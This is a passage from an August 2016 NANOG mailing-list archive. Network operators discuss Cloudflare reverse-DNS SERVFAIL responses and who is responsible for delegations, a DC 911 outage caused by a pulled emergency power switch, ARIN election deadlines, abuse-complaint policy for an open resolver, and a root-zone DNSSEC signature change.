networks? Trying to narrow this down to see if it's a result in a change in how our application handles these errors or if there's an issue going on with cloudflare's DNS setup. Thanks! Jeremy From opendak at shaw.ca Mon Aug 29 21:13:50 2016 From: opendak at shaw.ca (David) Date: Mon, 29 Aug 2016 15:13:50 -0600 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: References: Message-ID: <628ea202-e802-3cf3-3501-e39804860c33@shaw.ca> On 2016-08-29 2:46 PM, Jeremy wrote: > We're seeing a huge uptick in reverse dns lookup failures across an app, > 99% are all for Cloudflare ip addresses. > > Instead of seeing a PTR or NXDOMAIN we're getting back SERVFAIL. > > Does anyone know if this is a standard response from them? Do they not have > reverse DNS setup for their networks? > Got an example range? All the ones I'm checking here seem fine. > Trying to narrow this down to see if it's a result in a change in how our > application handles these errors or if there's an issue going on with > cloudflare's DNS setup. > > Thanks! > Jeremy > From marka at isc.org Mon Aug 29 21:28:43 2016 From: marka at isc.org (Mark Andrews) Date: Tue, 30 Aug 2016 07:28:43 +1000 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: Your message of "Mon, 29 Aug 2016 13:46:05 -0700." References: Message-ID: <20160829212843.53C1252BB76F@rock.dv.isc.org> In message , Jeremy writes: > We're seeing a huge uptick in reverse dns lookup failures across an app, > 99% are all for Cloudflare ip addresses. > > Instead of seeing a PTR or NXDOMAIN we're getting back SERVFAIL. > > Does anyone know if this is a standard response from them? Do they not have > reverse DNS setup for their networks? > > Trying to narrow this down to see if it's a result in a change in how our > application handles these errors or if there's an issue going on with > cloudflare's DNS setup. > > Thanks! > Jeremy If you are delegated a zone then you should answer queries for that zone. SERVFAIL is not appropriate. It indicates a condition that needs to be fixed especially from a authoritative server. Contact Cloudflare with a list of failing names. Cloudflare are generally good about making sure the DNS is giving well formed answers. The following is general and is not directed at Cloudflare. I know some people don't think errors in the reverse DNS are not critical but if you are delegated a zone it is your responsablity to ensure your servers are correctly serving that zone regardless of where it is in the DNS heirarchy. Failure to do that causes additional work for recursive servers. If you don't want to serve a zone then remove the delegation. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From sean at donelan.com Mon Aug 29 21:51:29 2016 From: sean at donelan.com (Sean Donelan) Date: Mon, 29 Aug 2016 17:51:29 -0400 (EDT) Subject: Don't press the big red buttom on the wall! Message-ID: See that big red button on the wall under the sign "Do Not Push This Button!".... DC 911 outage caused by contractor error http://wtop.com/dc/2016/08/dc-911-outage-caused-by-contractor-who-pulled-wrong-switch/ WASHINGTON ? D.C. is now operating two separate 911 centers after a power outage caused by human error left the nation?s capital without any emergency phone service for almost an hour on a busy weekend night. A contractor working Saturday night inadvertently pulled an emergency power shut off switch that cut electricity to the 911 phone system and a call routing system at the District?s Unified Communications Center, said the center?s Director Karima Holmes. ?Unfortunately because it was human error we weren?t prepared for it,? Holmes said. [...] From surfer at mauigateway.com Mon Aug 29 22:45:21 2016 From: surfer at mauigateway.com (Scott Weeks) Date: Mon, 29 Aug 2016 15:45:21 -0700 Subject: Don't press the big red buttom on the wall! Message-ID: <20160829154521.760D8AB3@m0087794.ppops.net> --- sean at donelan.com wrote: From: Sean Donelan See that big red button on the wall under the sign "Do Not Push This Button!".... DC 911 outage caused by contractor error http://wtop.com/dc/2016/08/dc-911-outage-caused-by-contractor-who-pulled-wrong-switch/ ---------------------------------------------------- That was caused by more than just contractor error. It is FAIL on many, many levels including design, testing and much more! There're a large number of folks responsible for this failure. scott From A.L.M.Buxey at lboro.ac.uk Mon Aug 29 23:02:12 2016 From: A.L.M.Buxey at lboro.ac.uk (Alan Buxey) Date: Tue, 30 Aug 2016 00:02:12 +0100 Subject: Don't press the big red buttom on the wall! In-Reply-To: References: Message-ID: >?Unfortunately because it was human >error we weren?t prepared for it,? >Holmes said. "But it's elementary!" Watson retorted :) alan From jcurran at arin.net Mon Aug 29 23:16:15 2016 From: jcurran at arin.net (John Curran) Date: Mon, 29 Aug 2016 23:16:15 +0000 Subject: ARIN 2016 Election - Nominations and Voter Eligibility Message-ID: <2DE67584-1B32-4510-B2AC-51253CE34162@arin.net> Folks - For those of you associated with ARIN member organizations, please note two important deadlines fast approaching - 31 August is the last day for ARIN Members to nominate candidates to serve on the ARIN Board of Trustees and/or Advisory Council. Note that 31 August is also the last day to nominate candidates to represent the ARIN region on the NRO Number Council (and anyone in the community may make such a nomination.) Submit your nomination(s) at https://www.surveymonkey.com/r/ARIN2016 and find more information about ARIN elections at: https://www.arin.net/participate/elections/ Each ARIN member organization may cast one ballot in the ARIN elections and voting is done by their Voting Contact on record. New this year, all Voting Contacts must be linked to an ARIN Online account in order to cast their ballot. 6 September is the deadline to have that account linked and otherwise ensure that your organization is eligible to vote. Information is available at: https://www.arin.net/about_us/membership/votingcontacts.html or please reach out to members at arin.net today with questions or requests for assistance. Thanks for your time and interest in the governance of ARIN! /John John Curran President and CEO American Registry for Internet Numbers (ARIN) From cma at cmadams.net Mon Aug 29 23:47:37 2016 From: cma at cmadams.net (Chris Adams) Date: Mon, 29 Aug 2016 18:47:37 -0500 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <20160829212843.53C1252BB76F@rock.dv.isc.org> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> Message-ID: <20160829234737.GA16137@cmadams.net> Once upon a time, Mark Andrews said: > The following is general and is not directed at Cloudflare. I know > some people don't think errors in the reverse DNS are not critical > but if you are delegated a zone it is your responsablity to ensure > your servers are correctly serving that zone regardless of where > it is in the DNS heirarchy. Failure to do that causes additional > work for recursive servers. If you don't want to serve a zone then > remove the delegation. You are assuming that an authoritative server operator has some way to know all the zones people delegate to their servers, and remove such delegations if they don't want to handle them. That is a wrong assumption. -- Chris Adams From opendak at shaw.ca Mon Aug 29 23:54:53 2016 From: opendak at shaw.ca (David) Date: Mon, 29 Aug 2016 17:54:53 -0600 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <20160829234737.GA16137@cmadams.net> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> Message-ID: <0e8b8828-d171-8e0a-1f38-810abc37be28@shaw.ca> On 2016-08-29 5:47 PM, Chris Adams wrote: > Once upon a time, Mark Andrews said: >> The following is general and is not directed at Cloudflare. I know >> some people don't think errors in the reverse DNS are not critical >> but if you are delegated a zone it is your responsablity to ensure >> your servers are correctly serving that zone regardless of where >> it is in the DNS heirarchy. Failure to do that causes additional >> work for recursive servers. If you don't want to serve a zone then >> remove the delegation. > > You are assuming that an authoritative server operator has some way to > know all the zones people delegate to their servers, and remove such > delegations if they don't want to handle them. That is a wrong > assumption. > Even more generally is that your authoritative server should respond to anything it is asked with an appropriate answer. Dropping/filtering can lead to bad situations. From marka at isc.org Tue Aug 30 00:01:41 2016 From: marka at isc.org (Mark Andrews) Date: Tue, 30 Aug 2016 10:01:41 +1000 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: Your message of "Mon, 29 Aug 2016 18:47:37 -0500." <20160829234737.GA16137@cmadams.net> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> Message-ID: <20160830000141.56CE952C6CF0@rock.dv.isc.org> In message <20160829234737.GA16137 at cmadams.net>, Chris Adams writes: > Once upon a time, Mark Andrews said: > > The following is general and is not directed at Cloudflare. I know > > some people don't think errors in the reverse DNS are not critical > > but if you are delegated a zone it is your responsablity to ensure > > your servers are correctly serving that zone regardless of where > > it is in the DNS heirarchy. Failure to do that causes additional > > work for recursive servers. If you don't want to serve a zone then > > remove the delegation. > > You are assuming that an authoritative server operator has some way to > know all the zones people delegate to their servers, and remove such > delegations if they don't want to handle them. That is a wrong > assumption. They have methods. They choose not to use them. See RFC 1033 COMPLAINTS then after that the court system. Mark > -- > Chris Adams -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From marka at isc.org Tue Aug 30 00:31:32 2016 From: marka at isc.org (Mark Andrews) Date: Tue, 30 Aug 2016 10:31:32 +1000 Subject: Handling of Abuse Complaints In-Reply-To: Your message of "Mon, 29 Aug 2016 12:00:49 -0700." <3dc3fd61-5123-0070-dd4e-435ce6785577@satchell.net> References: <3dc3fd61-5123-0070-dd4e-435ce6785577@satchell.net> Message-ID: <20160830003132.C65A252C766A@rock.dv.isc.org> In message <3dc3fd61-5123-0070-dd4e-435ce6785577 at satchell.net>, Stephen Satchell writes: > On 08/29/2016 08:55 AM, Jason Lee wrote: > > NANOG Community, > > > > I was curious how various players in this industry handle abuse complaints. > > I'm drafting a policy for the service provider I'm working for about > > handing of complaints registered against customer IP space. In this example > > I have a customer who is running an open resolver and have received a few > > complaints now regarding it being used as part of a DDoS attack. > > > > My initial response was to inform the customer and ask them to fix it. Now > > that its still ongoing over a month later, I'd like to take action to > > remediate the issue myself with ACLs but our customer facing team is > > pushing back and without an idea of what the industry best practice is, > > management isn't sure which way to go. > > > > I'm hoping to get an idea of how others handle these cases so I can develop > > our formal policy on this and have management sign off and be able to take > > quicker action in the future. > > It depends on the nature of the complaint. If it's an amplification > attack of some kind, figure out how the perp is doing it, and block it > as appropriate. For example, do you filter incoming packets with source > address of subnet network and broadcast (shorter than /30) and allnet > (255.255.255.255) broadcast, and filter packets outbound with > destinations of allnet broadcast? > > DNS and NTP can be tricked into generating packet storms. In > particular, you may want to block excessive large DNS requests inbound > using deep packet inspection at your edge. > > Not all abuse problems are the fault of the customer. You have to do > your part as well. I presume everyone of you is planning to install DNS servers that support RFC 7873 - DNS COOKIES? Yes, servers exist that support this and some TLD's are already using such servers (0.47%), Alexa .Gov and .AU servers (0.09%), Alexa Top 1000 (0.22%) and Alexa Bottom 1000 (.19%). Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From larrysheldon at cox.net Tue Aug 30 01:09:26 2016 From: larrysheldon at cox.net (Larry Sheldon) Date: Mon, 29 Aug 2016 20:09:26 -0500 Subject: Handling of Abuse Complaints In-Reply-To: References: <44A68DD2-40FC-470E-9FB2-29D10585886D@mykolab.com> Message-ID: <7c042cb6-5d11-ca97-217f-ed9a84ad2815@cox.net> On 8/29/2016 11:47, Steve Atkins wrote: > Unless your abuse / security desk is staffed by lawyers it's probably > better to avoid words like "criminal" and "unlawfully" altogether and > stick to "in violation of our ToS". Or "in violation of your contract (which includes, by reference, our TOS) with us." -- "Everybody is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid." --Albert Einstein From Larry's Cox account. From aaron at heyaaron.com Tue Aug 30 05:31:27 2016 From: aaron at heyaaron.com (Aaron C. de Bruyn) Date: Mon, 29 Aug 2016 22:31:27 -0700 Subject: Don't press the big red buttom on the wall! In-Reply-To: References: Message-ID: "?Unfortunately because it was human error we weren?t prepared for it,? Holmes said." I'm glad to know they are prepared for errors by deities and squirrels. -A On Mon, Aug 29, 2016 at 4:02 PM, Alan Buxey wrote: > >?Unfortunately because it was human >error we weren?t prepared for it,? > >Holmes said. > > "But it's elementary!" Watson retorted > > :) > > alan > From askoorb+nanog at gmail.com Tue Aug 30 08:32:25 2016 From: askoorb+nanog at gmail.com (Alex Brooks) Date: Tue, 30 Aug 2016 09:32:25 +0100 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: Hi, On 29 August 2016 at 16:55, Jason Lee wrote: > NANOG Community, > > I was curious how various players in this industry handle abuse complaints. > I'm drafting a policy for the service provider I'm working for about > handing of complaints registered against customer IP space. In this example > I have a customer who is running an open resolver and have received a few > complaints now regarding it being used as part of a DDoS attack. > > My initial response was to inform the customer and ask them to fix it. Now > that its still ongoing over a month later, I'd like to take action to > remediate the issue myself with ACLs but our customer facing team is > pushing back and without an idea of what the industry best practice is, > management isn't sure which way to go. > > I'm hoping to get an idea of how others handle these cases so I can develop > our formal policy on this and have management sign off and be able to take > quicker action in the future. > As you are developing a policy and procedure, you might want to have a look at the resources provided (free) by the Messaging, Malware and Mobile Anti-Abuse Working Group (M3AAWG). Whilst not answering your question directly, it can be useful to have some general abuse best practice documents around when developing your own policies. Lots of resources are available at https://www.m3aawg.org/for-the-industry, including: - Best Common Practices for Hosting and Cloud Service Providers - Best Practices to Address Online, Mobile, and Telephony Threats - Feedback Reporting Recommendation - Overview of DNS Security - Port 53 Protection - Abuse Desk Common Practices - The Anti-Bot Code of Conduct for Internet Service Providers There's a lot of stuff about email and email spam (including a whole page on FBLs at https://www.m3aawg.org/fbl-resources), but there is some stuff there on abuse in other domains as well. It's well worth a gander. HTH, Alex From dimith50 at outlook.com Tue Aug 30 12:12:38 2016 From: dimith50 at outlook.com (Hristo Dimitrov) Date: Tue, 30 Aug 2016 14:12:38 +0200 Subject: Looking for Spamhaus contact In-Reply-To: References: Message-ID: Hello, It has been pointed to me that the PBL Contact information is located in the "Help (Guide)" menu item the PBL Account. This opens a new page and the contact email is right at the bottom of the page. Not sure how I missed it. Thanks to all of you who contacted me offline. > From: dimith50 at outlook.com > To: nanog at nanog.org > Subject: Looking for Spamhaus contact > Date: Mon, 29 Aug 2016 16:35:45 +0200 > > Hi, > > > Could somebody from Spamhaus contact me offlist? > > I've run in the case "[CIDR] conflicts with other PBL master records" where the whole range previously seems to have belonged to another ISP who has returned the range to RIPE. However they still have it listed in a PBL and it is not possible to contact them. > > As per Spamhaus FAQ "...contact Spamhaus directly to obtain control of those Master Ranges. There is a contact address in your PBL Account." > > > The issue is that I do not see a Spamhaus contact address in our PBL account. And there doesn't seem to be any other conventional way to contact Spamhaus... > > > > > Best regards, > Hristo D. > > > From math at sizone.org Tue Aug 30 14:21:11 2016 From: math at sizone.org (Ken Chase) Date: Tue, 30 Aug 2016 10:21:11 -0400 Subject: Don't press the big red buttom on the wall! In-Reply-To: References: Message-ID: <20160830142110.GA792@sizone.org> 3 of my internet-lifetimes/startups ago, we had this happen when one of the L2 techs was doing their 'rounds' - but had a backpack on. They swung around and hit the safety cover on the BRS - which got knocked off. They freaked out a bit while putting the cover back on... and managed to activate it. Dead silence followed: "Whoa! What wasn't that?!" (A good story anyway. It wasnt clear from video exactly what happened. More entertaining in review when sped up and backed with Yakety Sax.) Hilarity ensued. Customers irated. Procedures were modified. SLAs were paid. Nicknames were coined. Could also be that it was a bit too red and shiny: https://www.youtube.com/watch?v=NITBfc1EOBo#t=27s /kc On Mon, Aug 29, 2016 at 10:31:27PM -0700, Aaron C. de Bruyn said: >"???Unfortunately because it was human error we weren???t prepared for it,??? >Holmes said." > >I'm glad to know they are prepared for errors by deities and squirrels. > >-A > >On Mon, Aug 29, 2016 at 4:02 PM, Alan Buxey wrote: > >> >???Unfortunately because it was human >error we weren???t prepared for it,??? >> >Holmes said. >> >> "But it's elementary!" Watson retorted >> >> :) >> >> alan >> -- Ken Chase - Toronto Canada From keiths at neilltech.com Tue Aug 30 14:40:42 2016 From: keiths at neilltech.com (Keith Stokes) Date: Tue, 30 Aug 2016 14:40:42 +0000 Subject: Don't press the big red buttom on the wall! In-Reply-To: <20160830142110.GA792@sizone.org> References: <20160830142110.GA792@sizone.org> Message-ID: At one point in one data center I dealt with a disgruntled employee hit the UPS disconnect button on the way out. Same story, procedures modified, cover put over switch with a hammer to break the glass, lessons learned, accounts credited. On Aug 30, 2016, at 9:21 AM, Ken Chase > wrote: 3 of my internet-lifetimes/startups ago, we had this happen when one of the L2 techs was doing their 'rounds' - but had a backpack on. They swung around and hit the safety cover on the BRS - which got knocked off. They freaked out a bit while putting the cover back on... and managed to activate it. Dead silence followed: "Whoa! What wasn't that?!" (A good story anyway. It wasnt clear from video exactly what happened. More entertaining in review when sped up and backed with Yakety Sax.) Hilarity ensued. Customers irated. Procedures were modified. SLAs were paid. Nicknames were coined. Could also be that it was a bit too red and shiny: https://www.youtube.com/watch?v=NITBfc1EOBo#t=27s /kc On Mon, Aug 29, 2016 at 10:31:27PM -0700, Aaron C. de Bruyn said: "???Unfortunately because it was human error we weren???t prepared for it,??? Holmes said." I'm glad to know they are prepared for errors by deities and squirrels. -A On Mon, Aug 29, 2016 at 4:02 PM, Alan Buxey > wrote: ???Unfortunately because it was human >error we weren???t prepared for it,??? Holmes said. "But it's elementary!" Watson retorted :) alan -- Ken Chase - Toronto Canada --- Keith Stokes From A.L.M.Buxey at lboro.ac.uk Tue Aug 30 14:43:13 2016 From: A.L.M.Buxey at lboro.ac.uk (A.L.M.Buxey at lboro.ac.uk) Date: Tue, 30 Aug 2016 14:43:13 +0000 Subject: Don't press the big red buttom on the wall! In-Reply-To: <20160830142110.GA792@sizone.org> References: <20160830142110.GA792@sizone.org> Message-ID: <20160830144313.GB15140@lboro.ac.uk> Hi, > https://www.youtube.com/watch?v=NITBfc1EOBo#t=27s "This video contains content from B_Viacom, who has blocked it in your country on copyright grounds." I love YouTube and copyright regional laws :/ alan From A.L.M.Buxey at lboro.ac.uk Tue Aug 30 14:45:09 2016 From: A.L.M.Buxey at lboro.ac.uk (A.L.M.Buxey at lboro.ac.uk) Date: Tue, 30 Aug 2016 14:45:09 +0000 Subject: Don't press the big red buttom on the wall! In-Reply-To: <20160830142110.GA792@sizone.org> References: <20160830142110.GA792@sizone.org> Message-ID: <20160830144509.GC15140@lboro.ac.uk> Hi, whilst we're posting YouTube clips..... maybe they'd have been better off keeping a copy of the Internet https://www.youtube.com/watch?v=iDbyYGrswtg ;-) alan From math at sizone.org Tue Aug 30 14:56:37 2016 From: math at sizone.org (Ken Chase) Date: Tue, 30 Aug 2016 10:56:37 -0400 Subject: Don't press the big red buttom on the wall! In-Reply-To: <20160830144313.GB15140@lboro.ac.uk> References: <20160830142110.GA792@sizone.org> <20160830144313.GB15140@lboro.ac.uk> Message-ID: <20160830145637.GE792@sizone.org> Wow, since Im in Canada *WE* are the ones who usually don't get to watch anything, and no $vendor has gone and made it available in any way to legally purchase here either. (See stories of proxies being blocked to Netflix US from Canada - to get the tastier US content unavailable to us - and piracy spiking back up here.) oh internet, you great equalizer. this might work: https://vimeo.com/126720159 otherwise we're off to indian and russian websites, de jure. /kc On Tue, Aug 30, 2016 at 02:43:13PM +0000, A.L.M.Buxey at lboro.ac.uk said: >Hi, > >> https://www.youtube.com/watch?v=NITBfc1EOBo#t=27s > >"This video contains content from B_Viacom, who has blocked it in your country on copyright grounds." > >I love YouTube and copyright regional laws :/ > >alan -- Ken Chase - math at sizone.org Toronto Canada From bzs at theworld.com Tue Aug 30 20:46:57 2016 From: bzs at theworld.com (bzs at theworld.com) Date: Tue, 30 Aug 2016 16:46:57 -0400 Subject: Don't press the big red buttom on the wall! In-Reply-To: <20160830142110.GA792@sizone.org> References: <20160830142110.GA792@sizone.org> Message-ID: <22469.61633.450785.508783@gargle.gargle.HOWL> About the worst that ever happened to me was a security guy's walkie-talkie setting off an instant Halon drop. Cost about $10,000 to refill and was fairly exciting for those present. That also cut the machine room's power. At least it didn't set off the sprinkler system. We sat down with the Halon system vendor to find out why that happened after proving, on a by-passed system, that yes indeed one of these common walkie-talkies sets the thing off. File under: More Things To Worry About! -- -Barry Shein Software Tool & Die | bzs at TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo* From dwessels at verisign.com Tue Aug 30 21:32:53 2016 From: dwessels at verisign.com (Wessels, Duane) Date: Tue, 30 Aug 2016 21:32:53 +0000 Subject: Root and ARPA DNSSEC operational message -- signature validity period Message-ID: <5F1C5102-CC30-4CAF-9C2D-61AFDF6EC2C7@verisign.com> DNSSEC signatures in the Root and ARPA zones are currently given a validity period of 10 days. The validity period is being increased to 13 days, per the recommendations of RSSAC's Report on Root Zone TTLs [1] (aka RSSAC003). Note that we are not aware of any cases where the 10-day signature validity period has caused problems for DNSSEC validators. This is a precautionary measure designed to accommodate a worst-case scenario. This change will be implemented on September 6, 2016. Please feel free to contact us at RZM at verisign.com with concerns or questions, and to forward this notice to others who may not have already received it. [1] https://www.icann.org/en/system/files/files/rssac-003-root-zone-ttls-21aug15-en.pdf DW -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 495 bytes Desc: Message signed with OpenPGP using GPGMail URL: From owen at delong.com Tue Aug 30 21:39:10 2016 From: owen at delong.com (Owen DeLong) Date: Tue, 30 Aug 2016 14:39:10 -0700 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <20160830000141.56CE952C6CF0@rock.dv.isc.org> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> Message-ID: <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> > On Aug 29, 2016, at 17:01 , Mark Andrews wrote: > > > In message <20160829234737.GA16137 at cmadams.net>, Chris Adams writes: >> Once upon a time, Mark Andrews said: >>> The following is general and is not directed at Cloudflare. I know >>> some people don't think errors in the reverse DNS are not critical >>> but if you are delegated a zone it is your responsablity to ensure >>> your servers are correctly serving that zone regardless of where >>> it is in the DNS heirarchy. Failure to do that causes additional >>> work for recursive servers. If you don't want to serve a zone then >>> remove the delegation. >> >> You are assuming that an authoritative server operator has some way to >> know all the zones people delegate to their servers, and remove such >> delegations if they don't want to handle them. That is a wrong >> assumption. > > They have methods. They choose not to use them. See RFC 1033 > COMPLAINTS then after that the court system. > > Mark Let us review this and compare to your statement? From RFC 1033: > COMPLAINTS > > These are the suggested steps you should take if you are having > problems that you believe are caused by someone else's name server: > > > 1. Complain privately to the responsible person for the domain. You > can find their mailing address in the SOA record for the domain. > > 2. Complain publicly to the responsible person for the domain. > > 3. Ask the NIC for the administrative person responsible for the > domain. Complain. You can also find domain contacts on the NIC in > the file NETINFO:DOMAIN-CONTACTS.TXT > > 4. Complain to the parent domain authorities. > > 5. Ask the parent authorities to excommunicate the domain. 1. Doesn?t really apply in a situation where someone has pointed an NS record for a domain at your server without warning. There is no SOA record from which to retrieve said mailing address. Also doesn?t work very well in cases where the SOA record does not contain a valid email address that reaches someone. 2. Do we really want NANOG buried in ?Will the @#@!@$!@$% who delegated XYZ.COM NS Records to point to my servers and please cease and desist?? messages? Personally, I vote no. 3. The NIC? Please explicate Mr. Andrews what that would mean in the modern era. Please cover both the normal case and the cases where domain privacy is configured. 4. This might _MIGHT_ actually work, but I suspect that $REGISTRY is unlikely to help much when $REGISTRAR accepted an NS record from one of their customers for a domain they registered that happens to point to your server. Similarly, I suspect $REGISTRAR is going to tell you that they won?t make changes without authorization from the domain owner. 5. I suspect that success in this effort will likely parallel the level of success I would expect in step 4. So, now that we?ve realized that RFC-1033 is utterly useless in this context and badly outdated to boot, let?s review your other suggestion? ?? after that [sic] the court system.? [sic] refers to the missing comma. So let me see if I understand correctly. I run a pair of nameservers. Let?s call them ns1.company.com and ns2.company.com Someone registers example.com and points NS records in the COM zone at my nameservers. I?m now supposed to seek judicial relief in order to compel them to stop doing that? Small claims doesn?t process claims seeking injunctive relief. I suppose I could use a $1,500 or even $5,000 small claims case as a way to get their attention, but that?s kind of an abuse of the process. If I want an injunction, at least in California, I have to go to Superior court. Now, first, we have to figure out jursidiction. As a general rule, jurisdiction goes to the court which is responsible for the locale in which the event takes place or where the contract was entered into, or the jursidiction set by the contract. In this case, there?s no contract, so we have to look at where the event in question occurred. The problem is that the law hasn?t really caught up with technology in this area and depending on who ends up being parties to the suit, the definition gets pretty murky at best. Is it the primary office of the registry? The registrar? The registrant? The location of the nameserver(s) which are erroneously pointed to? (What if they are anycast all over the world?) The business address of the operator or owner of those nameservers? Where, exactly do we file this suit? The next problem we have is who to sue. Do we sue the domain registrant? The registrar they used to register the domain name? etc. Yeah, I don?t think there?s enough possibility of any sort of recovery to make that worth the effort or expense. Owen From marka at isc.org Tue Aug 30 22:02:47 2016 From: marka at isc.org (Mark Andrews) Date: Wed, 31 Aug 2016 08:02:47 +1000 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: Your message of "Tue, 30 Aug 2016 14:39:10 -0700." <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> Message-ID: <20160830220247.B429652F1A39@rock.dv.isc.org> In message <926F8B85-8864-4424-BEAA-1836B718A9FD at delong.com>, Owen DeLong writes: > > On Aug 29, 2016, at 17:01 , Mark Andrews wrote: > > > > > > In message <20160829234737.GA16137 at cmadams.net>, Chris Adams writes: > >> Once upon a time, Mark Andrews said: > >>> The following is general and is not directed at Cloudflare. I know > >>> some people don't think errors in the reverse DNS are not critical > >>> but if you are delegated a zone it is your responsablity to ensure > >>> your servers are correctly serving that zone regardless of where > >>> it is in the DNS heirarchy. Failure to do that causes additional > >>> work for recursive servers. If you don't want to serve a zone then > >>> remove the delegation. > >> > >> You are assuming that an authoritative server operator has some way to > >> know all the zones people delegate to their servers, and remove such > >> delegations if they don't want to handle them. That is a wrong > >> assumption. > > > > They have methods. They choose not to use them. See RFC 1033 > > COMPLAINTS then after that the court system. > > > > Mark > > Let us review this and compare to your statement??? > > From RFC 1033: > > COMPLAINTS > > > > These are the suggested steps you should take if you are having > > problems that you believe are caused by someone else's name server: > > > > > > 1. Complain privately to the responsible person for the domain. You > > can find their mailing address in the SOA record for the domain. > > > > 2. Complain publicly to the responsible person for the domain. > > > > 3. Ask the NIC for the administrative person responsible for the > > domain. Complain. You can also find domain contacts on the NIC in > > the file NETINFO:DOMAIN-CONTACTS.TXT > > > > 4. Complain to the parent domain authorities. > > > > 5. Ask the parent authorities to excommunicate the domain. > > 1. Doesn???t really apply in a situation where someone has pointed > an NS record for a domain at your server without warning. There > is no SOA record from which to retrieve said mailing address. If they have pointed a NS record at you there is a SOA record. Either in the zone or in the delegating zone. > Also doesn???t work very well in cases where the SOA record does > not contain a valid email address that reaches someone. Some do, some don't. There is also whois address, web contact addresses etc. > 2. Do we really want NANOG buried in ???Will the > @#@!@$!@$% who delegated XYZ.COM NS Records to > point to > my servers and please cease and desist???? > messages? Personally, I vote no. Why not. It is a operational message about a misconfiguration. > 3. The NIC? Please explicate Mr. Andrews what that would mean > in the modern era. Please cover both the normal case and > the cases where domain privacy is configured. > > 4. This might _MIGHT_ actually work, but I suspect that $REGISTRY > is unlikely to help much when $REGISTRAR accepted an NS record > from one of their customers for a domain they registered > that happens to point to your server. Similarly, I suspect > $REGISTRAR is going to tell you that they won???t make changes > without authorization from the domain owner. The registrar becomes party to the disruption to your services and no the contract the registry signed with ICANN does not save them from being fined by a court further down the process so they should listen as it is their finanical interests to listen. Criminal law trumps contract law and deliberate disruption to services falls under criminal law. It becomes deliberate once they fail to act on the complaint in a timely manner. Remember we are dealing with matters of fact here. Published NS records and address records. Add to that there are published proceedures that are not being followed that they should be aware of. > 5. I suspect that success in this effort will likely parallel > the level of success I would expect in step 4. > > So, now that we???ve realized that RFC-1033 is utterly useless in this > context and badly outdated to boot, let???s review your other suggestion??? No, it isn't utterly useless. It also shows you have tried to solve the problem in a civil manner if you take it further. > ?????? after that [sic] the court system.??? > > [sic] refers to the missing comma. > > So let me see if I understand correctly. > > I run a pair of nameservers. Let???s call them ns1.company.com > and ns2.company.com > > Someone registers example.com and points NS records > in the COM zone at my > nameservers. > > I???m now supposed to seek judicial relief in order to compel them to stop > doing that? > > Small claims doesn???t process claims seeking injunctive relief. I suppose > I could > use a $1,500 or even $5,000 small claims case as a way to get their > attention, > but that???s kind of an abuse of the process. If I want an injunction, at > least > in California, I have to go to Superior court. > > Now, first, we have to figure out jursidiction. As a general rule, > jurisdiction > goes to the court which is responsible for the locale in which the event > takes > place or where the contract was entered into, or the jursidiction set by > the > contract. In this case, there???s no contract, so we have to look at where > the > event in question occurred. The problem is that the law hasn???t really > caught > up with technology in this area and depending on who ends up being parties > to the suit, the definition gets pretty murky at best. Is it the primary > office of the registry? The registrar? The registrant? The location of the > nameserver(s) which are erroneously pointed to? (What if they are anycast > all over the world?) The business address of the operator or owner of > those > nameservers? Where, exactly do we file this suit? Your lawyer will work that out. > The next problem we have is who to sue. Do we sue the domain registrant? > The > registrar they used to register the domain name? etc. Your lawyer will work that out. > Yeah, I don???t think there???s enough possibility of any sort of recovery to > make that worth the effort or expense. So you decide to not avail yourself of the process available to you. That is not the same thing as saying there is no process. > Owen -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From Valdis.Kletnieks at vt.edu Tue Aug 30 22:50:03 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 30 Aug 2016 18:50:03 -0400 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> Message-ID: <8738.1472597403@turing-police.cc.vt.edu> On Tue, 30 Aug 2016 14:39:10 -0700, Owen DeLong said: > I run a pair of nameservers. Let???s call them ns1.company.com > and ns2.company.com > Someone registers example.com and points NS records in the COM zone at my > nameservers. I would have expected that the resulting NXDOMAIN replies from ns1 and ns2 would usually make this a self-correcting problem. Are there actually people who do this misconfiguration on a zone big enough for the traffic to matter, and leave it that way for very long before they clue in that things aren't working right? I'd think that if somebody points billy-bobs-bait-tackle-and-internet.com at you, it might take you quite some time to notice - and if somebody whoopsies and points 